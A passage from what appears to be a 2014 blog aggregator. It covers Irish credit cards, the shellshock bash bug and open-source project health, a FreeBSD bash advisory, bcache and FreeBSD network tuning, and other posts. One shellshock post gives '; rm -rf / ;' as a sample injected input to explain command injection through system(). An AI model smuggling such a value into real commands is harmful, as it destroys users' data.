But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are on the other hand free; there are sometimes charges for "oversea usage" (foreign transactions), and you are charged interests if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy where it was €1.81 until they dropped it on the floor. So my requirements on a credit card are to essentially hide as much as possible these costs. Which essentially mean that just getting a standard AIB card is not going to be very useful: yes I would be saving money after the first 150 operations, but I would be saving more to save enough to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point every €2 spent. Since for each point you get a €.01 discount at end of quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (that I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weight a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince, for over an year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfer for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards also to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course as I said it has a cost, and a hefty one. Ont he other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in an year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which had feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm up to find a MasterCard card I can have to hedge my bets on the acceptance of the card – turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.

Project health, and why it's important — part of the #shellshock afterwords

by Flameeyes via Flameeyes's Weblog »

Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things or the nail on the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason why the security issues found had been considered so nasty is because we know they are widely used.

First there was Heartbleed with its discoverers deciding to spend time setting up a cool name and logo and website for, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork which I'm still not sure is going to stick around or not.

Just few weeks ago a dump of passwords caused major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault if the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and cater for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers don't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using them — but that's also a big problem that caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good for me, as I moved to zsh years and years ago, and I have been working for over five years years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes there is a GIT "repository", but it's essentially just an import of a given release tarball, and then each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful has having a repository with the intent clearly showing, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years, not the particular vulnerability but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while, at the same time Debian did it already, and the result is that the vulnerability for them is way less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed like many other projects in the open but behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

Limiting the #shellshock fear

by Flameeyes via Flameeyes's Weblog »

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their default shell in years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings in a system() call makes it trivial to implement remote code execution, think of a software using system("convert %s %s-thumb.png") with an user provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(), the mere call will cause the environment to be copied over and thus the code executed. But this relies on /bin/sh to be bash, which is not the case for BSDs, Debian, Ubuntu and a bunch of other situations. But this also requires for the user to be able to change the environment variable.

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I"m sure there are scripts using system(). If this is a nail on the coffin of something, my opinion is that it should be on the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on so forth. It is indeed the case that in the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a 10' pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably have already busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable", "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true, as SANS points out, it's a minimal part of the devices that is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out that the first fix was not thought-out properly) and make sure you don't self-host the stuff you want to keep out of the cloud in a server you upgrade once an year.

BASH shell bug

by Josh Smith via Official PC-BSD Blog »

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way — and BASH is not built-in to the  FreeBSD operating system itself (it is an optional port/package), so the level of severity of this bug is lower on FreeBSD than on other operating systems.

According to the FreeBSD mailing list: Bryan Drewery has already sent a notice that the port is fixed in FreeBSD. However, since he also added some good recommendations in the email for BASH users, we decided to copy that email here for anyone else that is interested.
_______________

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.
_______________

For more information the bug itself you can visit arstechnica and read the article by clicking the link below.

http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

Conferencing

by Flameeyes via Flameeyes's Weblog »

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I organize a conference (or rather help organize it, Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and be better the next time I'll try something like this.


Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong as he had to get an (easy) visa at entrance.

Getting just shy of a hundred people in a city like Dublin, which is by far not a metropolis like Paris or London would be is an interesting exercise, yes we had the space for the conference itself, but finding hotels and restaurants for the amount of people became tricky. A very positive shout out is due to Yamamori Sushi that hosted the whole of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful if the attitudes can be a bit grating online. And given that many people, including me, are known as proponent of Troll-Driven Development – or Rant-Driven Development given that people like Anon, redditors and 4channers have given an even worse connotation to Troll – it's really a requirement, if you are really interested to be part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.

After SELinux System Administration, now the SELinux Cookbook

by swift via Simplicity is a form of art... »

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and even the reference platform) even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit in the first time, so I re-re-reviewed changes over and over again this time – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.


Mehr als 15 Cent

by Hanno Böck via Hanno's blog »

Seit Monaten können wir fast täglich neue Schreckensmeldungen über die Ebola-Ausbreitung lesen. Ich denke die muss ich hier nicht wiederholen.

Ebola ist für viele von uns - mich eingeschlossen - weit weg. Und das nicht nur im räumlichen Sinne. Ich habe noch nie einen Ebola-Patienten gesehen, über die betroffenen Länder wie Sierra Leone, Liberia oder Guinea weiß ich fast nichts. Ähnlich wie mir geht es sicher vielen. Ich habe viele der Meldungen auch nur am Rande wahrgenommen. Aber eine Sache habe ich mitgenommen: Das Problem ist nicht das man nicht wüsste wie man Ebola stoppen könnte. Das Problem ist dass man es nicht tut, dass man denen, die helfen wollen - oftmals unter Einsatz ihres eigenen Lebens - nicht genügend Mittel zur Verfügung stellt.

Eine Zahl, die ich in den letzten Tagen gelesen habe, beschäftigt mich: Die Bundesregierung hat bisher 12 Millionen Euro für die Ebola-Hilfe zur Verfügung gestellt. Das sind umgerechnet etwa 15 Cent pro Einwohner. Mir fehlen die Worte das adäquat zu beschreiben. Es ist irgendwas zwischen peinlich, verantwortungslos und skandalös. Deutschland ist eines der wohlhabendsten Länder der Welt. Vergleiche mit Bankenrettungen oder Tiefbahnhöfen erspare ich mir jetzt.

Ich habe gestern einen Betrag an Ärzte ohne Grenzen gespendet. Ärzte ohne Grenzen ist soweit ich das wahrnehme im Moment die wichtigste Organisation, die vor Ort versucht zu helfen. Alles was ich über Ärzte ohne Grenzen weiß gibt mir das Gefühl dass mein Geld dort gut aufgehoben ist. Es war ein Betrag, der um mehrere Größenordnungen höher als 15 Cent war, aber es war auch ein Betrag, der mir mit meinen finanziellen Möglichkeiten nicht weh tut.

Ich finde das eigentlich nicht richtig. Ich finde es sollte selbstverständlich sein dass in so einer Notsituation die Weltgemeinschaft hilft. Es sollte nicht von Spenden abhängen, ob man eine tödliche Krankheit bekämpft oder nicht. Ich will eigentlich mit meinen Steuergeldern für so etwas zahlen. Aber die Realität ist: Das geschieht im Moment nicht.

Ich schreibe das hier nicht weil ich betonen möchte wie toll ich bin. Ich schreibe das weil ich Dich, der das jetzt liest, bitten möchte, das selbe tust. Ich glaube jeder, der hier mitliest, ist in der Lage, mehr als 15 Cent zu spenden. Spende einen Betrag, der Dir angesichts Deiner finanziellen Situation bezahlbar und angemessen erscheint. Jetzt sofort. Es dauert nur ein paar Minuten:

Online für Ärzte ohne Grenzen spenden

(Ich freue mich wenn dieser Beitrag verbreitet / geteilt wird - zum Beispiel mit dem Hashtag #mehrals15cent)

Daemonische Webschleuder

by Jesco Freund via My Universe »

Apache und Nginx gehören (zumindest laut Netcraft) zu den meistgenutzten Webservern. Wer einen der beiden genannten Webserver verwendet und als Unterbau auf FreeBSD setzt, kann beiden auch noch ordentlich Beine machen — und nebenbei die Systemlast senken. Dafür braucht man keine schwarze Magie, sondern lediglich ein Kernel-Modul1 namens accf_http. Selbiges ist übrigens keinesfalls neu; es wurde bereits mit FreeBSD 4.0 eingeführt und existiert somit schon seit guten 14 Jahren.

Dahinter verbirgt sich ein Modul der accept_filter Familie, das speziell auf das HTTP-Protokoll zugeschnitten ist. Selbiges bewirkt, dass FreeBSD's Netzwerk-Stack erst den kompletten HTTP Request entgegennimmt, bevor der entsprechende Socket der Anwendung signalisiert, dass eine eingehende Verbindungsanfrage angekommen ist. Die Logik für's parsen unvollständiger HTTP Requests kann so getrost ausgeknipst werden, da der Webserver sich darauf verlassen kann, dass hier ein vollständiger Request vorliegt.

Ein weiterer Nebeneffekt: Unvollständige Requests blockieren keinen Prozess oder Thread des Webservers, wodurch besonders der Apache Webserver vom HTTP Accept Filter profitiert. Nginx arbeitet mit nicht blockierenden Sockets und reserviert — anders als die meisten Apache MPMs — nicht für eingehende Verbindungen einen extra Thread oder Prozess, so dass Nginx durch unvollständige Requests nicht dazu getrieben wird, zusätzliche Prozesse oder Threads zu starten. Allerdings muss auch Nginx alle eingegangenen Verbindungen ständig abprüfen, um herauszubekommen, auf welcher endlich ein vollständiger Request vorliegt.

Die Ressourcenersparnis ist designbedingt bei Nginx also nicht so groß wie beim Apachen. Dadurch, dass nur vollständige Requests in der Verbindungsqueue landen, wird die Abarbeitung von Requests jedoch signifikant beschleunigt, was insbesondere dann ins Gewicht fällt, wenn die Beantwortung des Requests selbst kaum Rechenzeit benötigt (etwa weil sie aus dem Cache heraus geschieht) — eine aufwändige dynamische Webapplikation profitiert hier also weniger, da ein Großteil der Gesamtzeit der Beantwortung auf die Berechnung der Antwort entfällt, und nicht auf die Entgegennahme des Requests.

Und wie kommt man jetzt in den Genuss dieser Funktionalität? Wer den Apachen einsetzt, muss lediglich dafür Sorge tragen, dass das Kernel-Modul vor dem Start des Indianers geladen wurde, etwa indem es in /boot/loader.conf eingetragen wird:

accf_http_load="YES"  
Steht das Modul zur Verfügung oder wurde es fest in den Kernel eingebaut, nutzt Apache den Accept Filter ohne weiteres Zutun. Ist er hingegen nicht verfügbar, beschwert sich Apache sogar regelrecht mit einer Warnmeldung:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter

Nginx hingegen benötigt ein wenig Ermunterung, um auf den Accept Filter zurückzugreifen:

server {  
    listen 127.0.0.1:80 accept_filter=httpready;
    ...
}
Der Fairness halber sei aber gesagt, dass es damit alleine nicht getan ist. Um nicht nur Ressourcen zu sparen, sondern wirklich mehr Performance zu erzielen, kommt man nicht umhin, sich auch mit anderen Tuning-Optionen auseinanderzusetzen und dabei Einstellungen zu ermitteln, die zum tatsächlichen Einsatzzweck des Webservers passen. Als Stichwort seien hier die sysctl-Variablen kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace sowie net.inet.tcp.recvspace genannt. Umfangreichere Informationen dazu bietet z. B. der Network Tuning Guide auf Calomel.org.

1. Alternativ kann man den Filter auch mit options ACCEPT_FILTER_HTTP fest in den Kernel einkompilieren

Outreach Program for Women

by lu_zero via Luca Barbato »

Libav participated in the summer edition of the OPW. We had three interns Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks
Katerina decided to do something radical from the start and she tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it in smaller chunks to single out false positives. The patch itself gave some spotlights to some of the most horrible code still lingering around, hopefully we’ll get to fix those part soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big projects) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and help others doing the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and make it work at least as well as the former), but both kind of tasks are fundamental to keep the project healthy!

In closing

All the projects have been a success and we are looking forward to see further contributions from our new members!

bcache

by Patrick via Patrick's playground »

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformated the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformated with bcache.
In code:
wipefs /dev/md0 # remove old headers to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!

FreeBSD 10.1-BETA2 Available

by Webmaster Team via FreeBSD News Flash »

The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

UDP RSS update: ixbge(4) turned out to have issues..

by Adrian via Adrian Chadd's Ramblings »

I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at tihs:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try and rebalance traffic. Trouble is, I think it's a bit buggy and it's likely not working well with generic receive offload (LRO).

What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!

 

Some experience with Content Security Policy

by Hanno Böck via Hanno's blog »

I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

